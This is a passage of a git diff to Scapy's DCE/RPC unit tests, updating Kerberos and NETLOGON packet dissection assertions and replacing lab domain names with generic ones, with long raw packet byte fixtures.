StreamSocket(sck) -ssck.basecls = DNSTCP +ssck = StreamSocket(sck, DNSTCP) r = ssck.sr1(DNSTCP(dns=DNS(rd=1, qd=DNSQR(qname="www.example.com"))), timeout=3) sck.close() diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 2a28da73f79..daf133a5084 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -6,6 +6,7 @@ import re from scapy.layers.dcerpc import * from uuid import UUID +conf.debug_dissector = 2 + Check EField @@ -66,8 +67,9 @@ f.addfield(None, b'', f.default) == hex_bytes('0123456789abcdef0123456789abcdef' pkt = DceRpc(b"\x05\x00\x00\x03\x10\x00\x00\x00\xcd\x00-\x00\x01\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00j\x87\xb4\xa8DrE3\xfa\xc1\x1d\x9e\xb7\x8a_\xffr\xbe\x13\xc4<\x85\xf0\xf2'y\x84t%u|e\xef/\x04\xb0m\x98\xb1\xd2\x00KwW#P\x8f2\xecB\x81\x19\xf3g\xd2o[\x07L-\xb8\x89\x05\xcf?\xcf\t\xeb\xb3&&6\xb7\x84\xb6\xcd8Ao\x8c\x94\xca\x03\xe3\x0e\x86'-\xfaHj\xcez\xf0A\x83\x9dX\r\xe8\x96\x07Bs\xaf\x9c[=2\x9eS\xb1\x18\x84 \xb4y\n9\xdf\x92\x1c\xd8\xe2e\xd3^,\t\x06\x08\x00pj\x8f\x04`+\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x02\x01\x11\x00\x10\x00\xff\xffp\xc0\\m\xfe\xa4\xe1!\xf7\xdf\xbf\xa4\xad\xdf\xcb\x16\x1e\xb5+{\x97\xaf\xd5~") assert pkt.auth_verifier.auth_type == 9 +pkt.show() assert pkt.auth_verifier.auth_value.MechType.oidname == 'Kerberos 5' -assert isinstance(pkt.auth_verifier.auth_value.innerContextToken, KRB5_GSS_Wrap_RFC1964) +assert isinstance(pkt.auth_verifier.auth_value.innerToken, KRB_InnerToken) assert DceRpc5Request in pkt assert pkt[DceRpc5Request].alloc_hint == 120 assert pkt[DceRpc5Request].opnum == 0 @@ -81,10 +83,10 @@ assert pkt[DceRpc5Request].opnum == 3 = Dissect DCE/RPC v5 Bind request with NETLOGON secure channel -pkt = DceRpc(b'\x05\x00\x0b\x07\x10\x00\x00\x00\xe4\x00<\x00\x02\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00\x01\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00\x02\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00,\x1c\xb7l\x12\x98@E\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00D\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00APPS2019\x00APPS2019-RODC\x00\x08apps2019\x03lab\x00\rAPPS2019-RODC\x00') +pkt = DceRpc(b'\x05\x00\x0b\x07\x10\x00\x00\x00\xe4\x00(\x00\x02\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00\x01\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00\x02\x00\x01\x00xV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x00\x00,\x1c\xb7l\x12\x98@E\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00D\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00DOMAIN\x00WIN1\x00\x06domain\x05local\x00\x04WIN1\x00') -assert pkt.auth_verifier.auth_value.NetbiosDomainName == b"APPS2019" -assert pkt.auth_verifier.auth_value.DnsDomainName == b"apps2019.lab." +assert pkt.auth_verifier.auth_value.NetbiosDomainName == b"DOMAIN" +assert pkt.auth_verifier.auth_value.DnsDomainName == b"domain.local." assert pkt.n_context_elem == 3 assert pkt[DceRpc5Bind].context_elem[0].transfer_syntaxes[0].sprintf("%if_uuid%") == 'NDR 2.0' @@ -103,7 +105,8 @@ assert pkt[DceRpc5BindAck].results[1].transfer_syntax.sprintf("%if_uuid%") == 'N pkt = DceRpc(b'\x05\x00\x02\x03\x10\x00\x00\x00\x98\x038\x00\x02\x00\x00\x004\x03\x00\x00\x01\x00\x00\x00\x88\xd6k\xac\xab^\xafqA^\xee\x8e\xce\x16\x86i\xe5A\xafK#\xeb%\'l\x88\xd4A\x0f\xa6>\xaf\xed\xf65\xf0\xf9\xf25\x89\xf5\xc5r\xe6;t\xf5\x80 \x80~\xf6\x0cRQ\x0b\xea\xc2}\x8a>\x08\xc9\x04\x9c\xdcOj\xa3\x0c\x82~\xfe\xa6\xa3\x01^ \xee\xd3\xd2yf\xfa\xfbL\xec&\x8b60\xb9\x83j\x84\xa0\xbc*G\xe25\x1a\r\xf3\xc8\xa6ib9\x87\xcbt%\x17\xf8g\x17\x1cIR\xd5\'wW\xbedZbXv\xb7\xe5?#$(\xae\x06\x9e\xce\xe1K\xd9\'\x9fG\xde\xff\xc9j\xd7\xa4\x04\xcb]-\xbcr\xb9+\xdax\xee\xa3\xce\x9c\x15\x0c/\xb2\xcb\xaaF\t\x07/AQM\x18t\xdc\xea\x019\x11TOy\xf7\x7f\xd1\x87\xc7m\xea>\x84Y\xc3\xef\xd0\xa6e\xb0g\xc3\x12\xd9\xc4~$\xb8\xfc/0\x86\x0e0\x8c`5lU\xd1\xbf8\xd2\xcb\xb1%\xfa\xfabr\x10\x9a\xf8\xb7\xb1\x01$wU\x17r\x03Z\xdc\xdd^\xecU\xc1\xf1\x87\xad\xa1\xea\xd8\xf2\x82\xa8\x95\xd4\xd2\xc6\x8e\xf1\xcfN1k\xdc\xc3\xf7o]q\'a\xa3Y\r97\xfe.8O\xf9\xa7\x93\xd3\x99?K\x8bv.\xac=t\r\xba\xca\xd0\x82\xd8\x81\xaf\xe6cv\xbe\xcbN\x93\x9d\x0e\xd4\x119d\x83/u\xc8\xb2\x1c/q\xf0"\xc4\x04\xadB\xe3N\xed\xbbR\xc4yO\x1fQ\xdd}\xd2\xe3c\x1e\xec\xc7\xc4\xf8\xf6OV\xe5\x00*\xb0\t\xbd\xf0\xe5j\xbf\xa3\xe0\x85\xa0\x81\xc6\xb96\xb9\xec\xd7I\x16_\xe7K\xb2D\xad\xb5\x7fG\xb9\x9by\xe2\xd9\xcf\xe7J\x83Y-\xa7:\xa3\x16\xe7\xce\xf9\xf5\xeb\x88z&Je\xcb\x94\'\xdc?\xbf\xed!\x1a\xb3sI\xb5o\x00\x8dJ\xd9\xed\x160+\x11nD\xd0QIo]A\xc0\x89\xa8\xb2\xc9\xb6\xc7,\xf0V\x8a\xae\xa6\x97\x8e\x91tO\x8c\x94\x08\xf1ru\x87e\x0bq6\x8aZ\xb9\xf3\xb7\xbb\xaf;\x89\xdf\x8b\xbf\tA\xef\xe3\x07\x0fT\xed\xbb\x072\x8eQ\xf4\xce\x194A\\w\xb4\x88\xff[\xcf\x91N\x1b\xfb\xe3\xcb~\xe9\xfc\x195\x0f&96\x05\x9a\xe4\xc0~\xd9\x0b\xfd\xbc\xc9\x8fTXY\x9f\xe4\x87e!\x93$$\x0b\xfc\xe7Jm8\x18\xb5\xad\xff\x85\xc3\xe2%\xd5{\x8bs\xa7\xb0\x1e\x0ei\x8e ~\x8d\xbb\xfb\xef\x9d3\xb3\x8bv\xf7\xdf\xdei\xfa\xa5\xf1\xb7\x86\x14-\x9a\x16\x92\x88;\xcbH\xbd\x0c\xa0\x97\x05\xf4r\x11\xfae\xd7\xd8\x8d\xdb&\xad\xb4,\xadS\xf2W\xf0\xbf\xcb\x03z\x05@\xaf\x18\xa1\x1f<\xd2}1\xf3]\xaey\xd4\xab\x7f\xaf:\xfd\xcd\x8d\xb1\x95\x00=\x1e\xd0+\x03z\x15@\xaf\n\xe8\xd5\x00\xbd:\xa0\'\x00z"\xa0\xd7\x88\xd0#?5\x01\xbd\x16\xa0?\x02\xe8\xb5\x01\xfdQ@\xaf\x03\xe8u\x01\xbd\x1e\xa0\xd7\x8f\xd0\x85\x1fz\x9cZ^\xbfB\xca\x8c\xd9M.n/\x93F=\x06\xe8\r\x00\xbd!\xa07\x02\xf4\xc6\x80\xae\x03\xf4\xc7\x01\xfd\t >M\x00\xbd)\xa07\x03\xf4\xe6\x80\xde\x02\xd0[\x02\xfa\x93\x80\xde*B\x9f\xf0\xfa\xa7/\xf6\xcd\xca\xb3mjt\xb8h\xe5\x99\x94\x06O\x01zk@O\x02\xf46\x80\xfe4\xa0\x93\x80\xae\x07\xb6\x9f\x02t\x1a\xd0\x19@g\x01\x9d\x03t\x03\xa0\xf3\x80n\x04\xf4\xb6\x80\xde\x0e\xd0\xdb\x03\xfa3\x80\xde\x01\xd0\x9f\x05\xf4\x8e\x80n\x02t3\xa0[\x00\xdd\n\xe86@\xb7\x03z2\xa0w\x02\xf4\x14@\xef\x0c\xe8\xa9\x80\x9e\x06\xe8\xe9\x80\x9e\x01\xe8\x99\x80\x9e\x05\xe8]\x00=\x1b\xd0s\x00\xbd+\xa0w\x03\xf4\xee\x80\xde\x03\xd0{\x02z/@\xef\r\xe8\xcf\x01z\x1f@\x7f\x1e\xd0\xfb\x02z?@\xef\x0f\xe8\x02\xa0;\x00]\x04t\t\xd0e@w\x02z.\xa0\x0f\x00t\x17\xa0\x0f\x04\xf4<@\xcf\x07\xf4\x02@/\x04t7\xa0{\x00}\x10\xa0{\x01\xdd\x07\xe8~@\x1f\x0c\xe8E\x80>\x04\xd0\x87\x02\xfa0@\x1f\x0e\xe8/D\xe8~\xd9[\xe0\xf3\x16\xfd\xa3\xbf\x18Z\x06\xcf\x93R\n<\xf9:\xa7\xd7%\x17J\xf9\xc3t\x85B\x81|\xdf\xf9l\xdcK\xc0\xf7\x8d\x08-\x83\xc7\xa5\x19\xb2\x7f\x88\xdb\x9b\xa7\xb3\xb8\x0b\x0be\xd1\xefr\x17\xea\xcc^w\x9e\xec\xd5\xf9doQ`\x11\xf8"\x8f\xdbU\xe8\x7f\x00g\xa4F\x9c\x975\xe2\x8c\xd2\x88S\x1cZ\x06\xcf\x1bSMY)\xba\x9c\xc0*.Q\x8e\xb5\xceh\x8cuJ0\xd6\x19\x83\xb1\xce\xd8\xd0\xf2Y\x94\xb8\xe8\x9cn\xaf.\xc3b\xd6e\xcb>\xd9\xaf+pK\x83\xf3\xe5\xfb\xd9\xafh\xc8~o\xde\xc7\xb7*|].e\xf4\xd6\xd5\xc3[Lm\xef\x19\x17bG\x1b\xc7\xe3\x01}B\x84~\xe5\xe4\x87\xdbxs\x15\xeb\xae\xa5\xf3\x96\x14Oi\xf0\xd7D`\xfdI\xa1ep\xfe!#;\x0b\x1c9\x93\xef\xf5\xe7\xa4\x80\xfeWC\xcb\xe0\xfc\x8a\xadH\x0e\xc4%\xdf\x9d\xab\xebj\xc9J\xc9\xba\xcf;\x05\xc1;\x15\xc1;-\xb4\x0c\xce1X;Y\xb2\x8a8\x9d%\xdf\x15\\\'-;\xcb\xa2\xb3Ek\xfbt\xcc\xf5f\x84\x96\xf5C\xebE[\xeb\xfd?\x8e7\xddP\xd42s\xe1\xd1\x91\xf9o\xd9\xc7\xc6\xcd\x0c\xad\x17\x9c+I\xf6\xba\x07{tY\xee|\x978L\x17\\/\xa50\x902\x9d\x82\x18\x18C\xb9\x1e\xb1\x14x\xe7\xfbf\x85\x96\xd1r\xa7\xc7\xebv\xba\xf2\xe5;%\x88\x98\r\xf8}r\xe1?\xde\xe0g\x0e\xa2\x7f.\xe0\x8f\xfc\xcc\x0b-\xa3\x8d\xd1\xf9\x80\xbe\x00\xd0\x17\x02\xfa"@_\x0c\xe8K\x00})\xa0/\x03\xf4\xe5\x80\xbe\x02\xd0_\x03\xf4\x95\x80\xfe:\xa0\xaf\x02\xf4\xd5\x80\xbe\x06\xd0\xd7\x02\xfa:@\x7f#\xb4\x0c\xeeW=\\\x85\x9d\xfc~\x8f\xce4\xd8\xefN\xca\xf2\xba\x87\x0e\xbbS]\xee_\xefM\xcc\xf5\xd6\x87\x96\xc19\xefn\x81\x04\x99\x9e\xeb\rd\x80\xfb}\x1b\x14\xfa6*\xf4mR\xe8\xdb\x1cZ\x06\xe7\xfc\xedCt\x81\n\xeb\xbb\xcf\xb3E\x81g\xab\x02\xcf6\x05\x9e\xb7\x14x\xdeV\xe0\xd9\xae\xc0\xb3C\x81g\xa7\x02\xcf\xae\xd028/n\x16|\xb2\xce\xee\xf2\xcaC\x84\xfc\xfc@\x82\xcfu\x15\xca\xc1\xb5\xee[)\xf0\xd9\x1dZ\x06\xafWX\x9d>\xab\xaf\xb4\x82>p\x18\x11{\x10\xbc{C\xcb\xe0\x0e-\x83\xd7/n\xa7\xcdt\xa1P\xc8\r\x1c2\xde>\x86Qp\xaaB\x1c\xd7\x80\xf1\x89\x06\x8c\x13\xa1e\x8b\xfb\x18\x81#\xac"\x97\xa4\xe4\xc4\xebS\r\x18\'5`|vO\r\xd0\xa7\x87\x84\xd2\xfb\xc2\xd2\xfb\xf5p\x15J\xee!\xa1K\xf0\xd9Y\x96>\xd1\xee\x96\x99\x01pg\x02\xfa\xac\x90\x10\xbc\xe7\xa2\xbb\xa70\xea=\x17\xb3\x15\xfa\xe6(\xf4\xcd\x8d\xe2s\xaei\x917zz\xcf\xb4U\xe3\xc7\xfe\xfdJ\xe2\xce\xc5\xf3"\xda\x1f\xa9\xcf\x8f\xd0OU\x95\xcc\xcf\xb3\xc6\xcc\x05sV\xd1S+V\x18\xbf B\xb7\x97;;|\x89\xef-[\xf1\x91W\xe6\x0cJ\x1c;la\x84\xce2\xba\xdcn\xee\xda\xb6\x89SV1\x1b\x9b?\xfa\xc8" ~\x8b\x01}\t\xa0/\x05\xf4e\x80\xbe\x1c\xd0WD\xe8K{\x9dj\xc7}nM\x9f\xea\x7f\'xi4\xee5`\xfd\x95\x80\xfe:\xa0\xaf\x02\xf4\xd5\x80\xbe&B\xaf\xf8\xd3;\xcf\xfd\xf6[\xbfN\x8bn\xb9?~\xe3\xfa\xf2\xf6kCB\xf0Y~\xbb\xd7G\xdd{\xe1,\xd2\xbb.\x867\xf2\xf3\x06\xd0\xae7\x01}}H\x08^\x1f\xc9\x12\x85\x9c"\xf1\xf6\xf3\x8a\xc1\xbf\xf2\x81\x8c]\xcd\xf3W\xef/O\xbe\xde\xcb\\\xdc\xa6u\xc9W\rOU\x8b#\x82\xaf{\x08\x08\xe5\x9e\x1f7\xe1\x87\x06\x87j,\xb9X\x89x*\xb1S\xff2\xa5B\x1cQ\xe5\xf6\xa2b\x19\xe2@`\x11_\x8e\xd8\xbf\x9a\x90J\x9f1\x0c\xfe\x95\xc3bV\xbd\xbdHL$n\'\x1c_\xce\x80\xc1\xfe\xc0\xb2\xb0\xf4\xd9\xb7\xbej\xdb\x9aP\x8b\xe8\x93\x95\x92e\xeb\x93R\xe8\xf2\xff\x83\x8e#jT \xfa\xf4\xb1Z\x82\xcf?g\x86\xfe\xd4\xb5?!\x903}\xb9\xa9\xd9\x1e\x914P\x06\x03I\x84\xc7\xe5\xdd\xe6?\x17=\xf2c3\xcb\x84y\x03\xedLI\xdd\rZ\xc5\x05\x99\x8b\x19\x17\xec\xf6\xdf\x1f\x97\xe03\xb9\x9d\xeep\xb7\xfd{\xc1\xc7\x83\x04\xa6\xf3\xbes\x15n\x14\xcb\xcd\x06(\xe6V"D\x9f\xec\xf0\x0cv\x94>\xe3\xd9S5\xaf.\x11|\x8e!\xc9\xc1\xc92/K\x94\x91eX\x916:EN[\xbe\xec4R\x06=\xe948E\x07\xc5\x18)J\xd0\x96op2<\'\x91F\xbdL3\x06R\xefp\x8a\xda\xf2Y\x92\xe2\x1c\x92\xc0\x93\x1c-R$GQFm\xf9zFt\xb2\x06\xd6\xe1`$Jp\xf2\xa2\x91)}\x86\xb5\xbfj\xbe\x8e\xc8L\xb3\xd9(\x1bI[\xf4\x9c\x89\xb2\x1b\xf5\xa4\xc1\xce\x1b,,e\xd2\xdb\xedv\x9e\xd7v;H#gt\xb2N\'\xa9\xa7\x05#\xc7\x8b4\xd6\xd5\xf2\xa1\xb1\xae\x96\x0f\x8dul>\xe2XW\xbb\x1d\xd0X\xc7\xe6\xc7\x18\xeb\xd8\xcc\xffQ^\x7f\x98w\x1f\xe6]\x15y7\x8c\xf7X\xc5^gjS\xbd\xd2JF\xcdi\xf3\xd5\xe9\x84\x81jy/\xc4%Wk\xb7\xe5M\xfb\xe2\xba\x7f\xcd\xb6\xe5g\rU\xcb\xab\xe2\xee8\xcb\xb8\xb9\xaee\xda\xae\x8fV\xbc\xe6\xbezZ-\xef\xc3u_d\x9c\xbb6\xd12\xb7\xf1\xae\xea\x13v\xc7UU\xcb\xb3\xff~-aW\xad\xca\x1d\xd7e\xcd\x1f\xfa\xf3\xdb\xab{\xab\xe5\x15.-v\x9d\xeb\xb7\xc9\xbee\xe1\xf2\x83\xb6}K]jy\x83\x98V\x95\xde\xd2\xb72\xef\xd0\xaf\xb4\xc6\xcd\xae\xeaP\xcb\xdb\xc8\x9d\xbf!m\x7f\xa5\xf3\xe2\xaf\x9e\x1c\x93|\xb4\xf8g\xb5\xbc\xc33\x9f\xf9V\xf2\x1b;m\xb4\xc6/\xbf9\xb1\xed\xb7jy{K&\xd7\x996}fJ\xf1{\xcfN\x9d\x7f\xb8wY\xb5<\xe7\xa57\xd2-\xcb\xb3\xac\xeb\x9f]\xf0\xc2\x91\x9c\xda\xdb\xcb\xa8\xe4\xfd\xbe\x9b\xaa\xbb\xfd\xf0\xa7\xa61\x9f\x1c2U\x94\xfeP=^\x8e\xddx\xfc\xe0\x9a\xf8\x83\xe6M\xdd\xbc\xfc\x98YG\xae\x12*y\x1f}9\xb2u\x85\x0b\x1dS\xb7\xd6\x9c\xa5\xafxe\xc1F\x0c^X\x8e}\xf7\xc8\xbaq\xdf3\xeb\x8b\x8ak\x17\r\xd6\xc9\xbd\x9b(\xe6)\xacEj\xf9P-\xc2\xe6#\xd6"\xb5\xdb\x01\xd5"l~\x8cZ\x84\xcd\x8c2Vv\xd79P\xb4\xf5\x838\xf3*\x9b\xa1\xed\x97e\x9f\xaa\xaf\xf5q\x8bZ>4V\xb0\xf9\x88cE\xedv@c\x05\x9b\x1fc\xac`3\xa3\x8c\x15j\xc7w\xdd\x86\xd5\xfb\xcc6\xf5\xe0H\x87\xc7k\xaa\xa9\xf5XQ\xcb\x87\xc6\n6\x1fq\xac\xa8\xdd\x0eh\xac`\xf3c\x8c\x15lf\x94\xb1\xb2w\xd3\xc81\x99\x95\xb6en[\x98\xda:\xf5\xdb\xab\xc7\xb4\xeeKl>b_\xaa\xdd\x0e\xa8/\xb1\xf91\xfa\x12\x9b\x19\xa5/7\x9c:\xbc=\xf5\xe2\x0e{\xc9\xcf\xeeA\xfb\x9f]\xdcM\xeb\xbe\xc4\xe6#\xf6\xa5\xda\xed\x80\xfa\x12\x9b\x1f\xa3/\xb1\x99Q\xfarV\x99\x7f\xe9vN\xfe\xae\xd3\xfa}\x1d\x86^i\xb7\xc9\xaau_b\xf3\x11\xfbR\xedv@}\x89\xcd\x8f\xd1\x97\xd8\xcch9vw\xadf\x9f\xe6w\xb2\x8c\xe9;\xe2f{\xba\xe0\x84\xe69\x16\x97\x8f\x9acUn\x07\x98cq\xf9\xb1r,.3J_\xb2-:T[\xfa\xd1\x87\x19k\xce\x99\x96\x7fQ\xff\xa7\x0c\xadc\x80\xcd\x8f\x11\x03lf\x94\x18\xdc\xbc^\xfe\xbd\x15W[e,\xf5\xf9\xba\'L^\xdcA\xeb\x18`\xf3c\xc4\x00\x9b\x19%\x06\xd3\x0e\x1b\x1e\xdbT\xd47s\xc5\xfb\xad\xf6\xbd\xd7\xf8\xa9\x8dZ\xc7\x00\x9b\x1f#\x06\xd8\xcc(1\xf8\xa6\xdd\x7f\'^)H\xca\xd8\xe0\x7f1\xf9h\xe5\x7fw\xd6:\x06\xd8\xfc\x181\xc0fF\x89A\xc7Us\x93\x1a\xf6\xdcaZ[m\xf5\xc4E}.\xf1Z\xc7\x00\x9b\x1f#\x06\xd8\xcc(\xf3b3\xd7\x0be\x1f-\x9b\x9f6\xe1\x8b\x833\r=\x89sjy\xedF7\xedY\xbf\xfd\'\x9d\xf7\xdcz\xb7a\xbds\x1dp\xee\x15\x08\xe3y\xe2\xd7\xeeig\xea\xd0y\xf1\xf3\xbf\x9f^4\xa2b\x7f\xb5\xbc\xf1\x93\xe9v7\xf2\xb7[KF\xe4\xd4\xd6\xef\x9e7]-o\xc7\x89\xe2W\xf6\xfc`\xb5\xaf\xf8\xe2\xa27g\xd4\xb4\x05jyL\xd9\xe7*u=?-}\xc1$\x13s\xfd\xc2\x8c_\xd4\xf2\xb6\xe7\xfd\x98z`\x9b;u\xf3;\xcf\xaf<6\xfd\xe3/U_\xe3+x\xe3\xd0\xdb\xc5\xdd2\xd6O8/\xfd\xf4\x82y\x08\xf2\xf5l\x03O\xd12)\x89N\x92b$F\x14\xc4\xff\xc1\xbd\x95\xacE\xaf\x8fhw\x8f\x17\x12\xce7\x1b~"m\x19;\xf2\xa5g\xae\x1f\xcfCm7\xcf3NQ\x12DR&I\x9a\xd4\x0b\x066\xfc8\x0e\x9b_z\x1c\xc7\x1a\r\xbc\x9e4Q6\x83\x9d\xb2\x9bi\x13G\xf2&\x83\x81d9\x96\xa4\xb4\xdd\x0e\x87\x18\x8c?\xcd\xf1\x0e\x86%e\x9a\xa7Hm\xf9\xfa@\xb7\x8a,K\xb1\x94\x9118\x1c\x923\xe2\x9e\xd4\xbe\'\x13\xc6\xed\xb0\x9c\xad\xb1i\xf5\xb1\x8c\xaf?\xd7\x8d\xd1\xba\x1f\xb0\xf9\x88\xfd\xa0v;\xa0~P\xcb\x87\xfa\xa1q\xf1\x13\xd9\xe7N\x8e\xe9Tr\xad\x9f0f\xe9\x8f&\xad\xdb\xaf\x96\x0f\xb5_\xf5\xb5z\x80\xff\xde\xa7\xc4\xca\xe3\xd5,\xb6\xddUO^g\xc6~\xff\'\xfa\xb1A\xe0\xc4\xcf)\xf2\x92\x93"I\xc9\xc8\x90Fm\xf92\'3\x12-\x08\xa4\xd1ht\xca\x02\xad\xd7\xf8\x1e8\x88_\xf5\xe0\x9b\xe4\xee>\x1f\xd9\xe7W\x9f6-y\xfc\xb9\xf6\xa8|\'\xc3\x1aE\x07\xcd\xf3N\x83\x81rH")\x85\xf3\x8fUY5bC\xa7\x81\x99\xe3\x07\x0c\xb4V\xecz\xf2\x06r\xffR\x82(r\xa4^b\x04\')\xcb\x81\x7f\x87?\xef\xf1\xc7\x86\xbd\xbf\xd7k\xb4+s\xc9\x94\xed\x8buu\xe9\x17\x95>+\x10|\xde#\xee\xee\xf3\x1e\xc1\xdfD\xea\xad\x96\x99\x90@\xf4\xf1\xb8\xac\xfd\x1b\xb3_5\xac\xd9\x7f\xacFq\x12\xb1\x96\xe8r>A\xeb\xb1\x83\xccGl\x7fq\x85?\x1aw\xa9|\x91\xacX\xe0\xafr\xf1\xa3K\x13\xb5n?2\x1fq\xec7\xb8\xe2\xaf\xfc\x9a\xa9B\xc6\xe8\xf5\xa7\xfd7\x1b\x9c\xc9\xd1\x80\x1f|HZ\xbe\xc3O?\xe3c\xc6\xb5\xa9\xd0q\xe1\xce\'z\xc4\xc7\x9fI,\x1f\xc0\xc4)\xe17#H\xd9IR2\xcf\'\xc9\x0e\x9aNb\x18=\x97\xc4S\x14\x95\x148\xb3&\r$\xed\x08\xeck\xc2}\xc7L\xd8\xdfw\xe7\xdcHp\xf2\x1c-\x88\xce\xc0\x169dJd\xd8p\xbend\xfbj\x93\x1bt\xb5/\xdb\xd2\xa5{\xbb\'\'~\x85|\xcc\xc4p\x06\x03\xc712\xeb`\x03Gd\x8c\xde\x18>G\x80\xcd\xbf}\xcd\xcd\xc22\x16\xcefb\xad\xac\xd1`dm\xa4EO\x1b\xf5\xb4IO[#\x9e\xe9{k\xe7\x94M\x7fv/\x93\\r\xd6T\x9e\x9a\xb1Z\xf9=\xaf\n\xb7\x03\x9b\x8f\xb8\x1d\xc5\xcdw<=O>m^_kO\xeb\xd5\x0b\x8e7@\xae\x9bFY\x12D\x81!y\xde@\xd3\xbc\xc09\xb5\xe5;\x04\x87@\n\xb23p$\xaeg\xf5\xa4\xc0;\xb4\xe5\x8b\x0c/\xd1\x0c\xcbI\xa4\x9ebX)\xb01\xda\xf2\xe9 \x94"%\xde\x118\xc6\xd7\x1beg\xe4\xbd\xa0\xb4\xff\xd7E\x1dz\x98\xd6~:zm\xe3>IiZ\xc7G-\x1f\x8a\x8fZ>\x14\x9f}5\x16\x8d\xdc12\xcf\xb2\xba\xe6\xe6\x93U\x9fOS~o\xb4\xc2\xf6\xab\xe5C\xedoV.\xe5L\xb3\x1c\xd9\xf6\xb6\x7fD\x8b\xcf\xf6/l\xaa!\xbf\xb4~\xfee\xa95rMV\x8b\x94UC\xab\xf6\xec\xd5\xe5\x857\x14\xd7\xcfj\xa1\xfa9$\xcf\x17Q@\xc3\xda\x8f\xcc\x8f\x8c\xbf^\x96\x1c<\x1f8\xbbu\n\xc1\x19\'*"\xffT\xab_\xe9\x87\xcb\x89\x13\x92\x97\x9d\xc9\x9a\x97=\xfa\xc2\xea\xb2\x1a\xf3\xe3\xb7\x1e\xfa\xf9\xd0;\x84i\xac\xf1\x8bu\x8f\x8cu!_\x0b\x85\xf8g\xb6\x1d?0\xeaF\x7f\xeb\xa2\xcf.\xc8\x13\xc7\xd8R\x91\xf9\xb2\xc8K\x0e\x87S\xa6(\x89\x97E\x83\x1cQ\x07\xb0\xf9\xa5u\xc0L\x19\x18\xbd\x9e\xe2\xf4V\x0be5\x18H\xd2\xa6\xe7X\xab\x857\xd9-\x11\xe3t\x83#\xe3\xd7M_\x1d\xb0\xbe\\\xab\xdc\xfcE\xe7\xeb(\x9f\xd3Q\xb8\x1d\xd8|\xc4\xed(\x9f\xfb\xc3\xf0\xef\xda\xd6O\x1e\x97\xf4\xcb\xc2\xc4\xc5\xa7\x91\xef\x1d\x85\xb6\x03\x9b\x8f\xb8\x1d\x8c\xf0\xc7\x85\xdf\x16\xa7\xa4,\xff\x8c\x1e\xf0a\xfc8\xe5\xd7\n\x15n\x076\x1fq;*O\x1d\xb9\xe5\xfc\xf7\xe5,\xcb\xd7\xd5\xdc\xe5\x9c\x147N\xeb\xed\xc0\xe6#n\xc7\x8a\xfc\x9b\xeb\xfaVe\x92\xa7\x8f\xa9|\xd9\xfb\xd7d\xf4\xe3\x0c`;\xb0\xf9\xf0v\x84}\x8f\xa7\xf7\xfc\x7f\x8d\x9c\xe0\xc9\xd8\xf9h\xa3)\x8d\xebu\xb8\x86\xf6=V+\xc3\xf1\xa4\xd9\xcc[\xadz\xce@2F\x93\xc1\x1c8\xb0\xd4\x9b)J\x1f>w\x89\xfd=\xd5\x89\xae\xb2W\x96\xdc\x16w\xa1\xdf\xeb\x0e\xde#\x91\x1d\xfaS\xc7\xad\x19\xe2Z]Bn\xa1\xdb\xe7w\x89>"\xe2\xdc\x07\x9b}\xe7\xba\x87\xcc\xd0\x06\x9ee\x9d\x92\xa4g\x04V\x16\xc5\xf0\x98\x0c9\x9b\xf7n\xea7\x972\'\xec\xbe\xd8\xfdJf9\xe5\xe7\xa2@L\xb0\xb9\nb\x82\xcdV\x18\x93\xcdl\xff6\xd7.\xae2-\xb5\xcay\x96\x85i\x8cV1\xc1\xe6*\x88\t6;zL\xc2\xf8\x03+&u{\xf2\x885c\xe2\xc0\xe3}{\x9d\xdb\xaf\xfc>\x89\xe8\xfc\xb0\xf9\xd7\xf5-\x96wy\xae\xf8g\xd3\xd65\xf5\x0fu\x1b\x9eX\x17e\xfe\xb5\xe6\xdd\xf9\xd7\xb0~Df\xde\xed\xc7\x0c[\xd7\xb4\xcc\xe4\xcc\x8c~\xc1\xc6\x13\x84vm\xad|\xb7\xad\x8e\xc0\xfft\xa8e&\xd4\t]\xcb\xd3;8Q\x96\xf4F#+\xc8\x82\x931\x84M?i\xd3\xfe\xc6\x81\xf6\xc7\xdfm\x7f\xd8\xb52\xecX\xc7\x13\x19]\xad9\xfd\xd2J\xc3\x1c^\x17\xb0\x99\xa5u\xc1nd\xecf\xc6h\xb0\x99\x98@\x0cL\xb4\xd1\xce\xf06\xcaH2v\xce\xa6]\x7f\x96\xbd\x1b\x8f\xb0k\x9c\xd8m\xafL\xf8\x84\x02\x9fO\x97\xef\t^<\xbc3/\xa9\x8eY\x87\xc8qI\xc1\x9f\x15Ks\x8bB\xf0\xe7\x84%]\xd6\xed_\xe0\x0c\xcbO\xd8\xfc\x9a\xc1\xdf\x83\xf7\xcb\xa2_\x96\xfa\xf9\xfcn\xaf\x90+\xdf3\xe6\xd4\xb1\xab\x10\xf9>\xc1\xe7\xf3\xb8\xbc\xc1\x80\x84\xbd\xd7\x0f\x9b\x99\x18dz